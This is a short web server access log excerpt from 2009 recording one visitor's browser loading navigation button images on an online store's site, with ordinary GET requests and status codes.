76.124.28.60 - - [13/Oct/2009:01:48:43 -0400] "GET /images/head_btn-catalog-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:43 -0400] "GET /images/head_btn-brochures-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:43 -0400] "GET /images/head_btn-aboutUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:43 -0400] "GET /images/head_btn-seminars-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:43 -0400] "GET /images/head_btn-tutorials-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:43 -0400] "GET /images/head_btn-conventions-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:43 -0400] "GET /images/head_btn-contactUs-over.gif HTTP/1.1" 304 - "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
76.124.28.60 - - [13/Oct/2009:01:48:45 -0400] "GET /images/cat_collapse.gif HTTP/1.1" 200 76 "http://www.aceonlinestore.com/CGI-BIN/LANSAWEB?WEBEVENT+L118C5F471779C200382800E+M37+ENG" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 1.1.4322)"
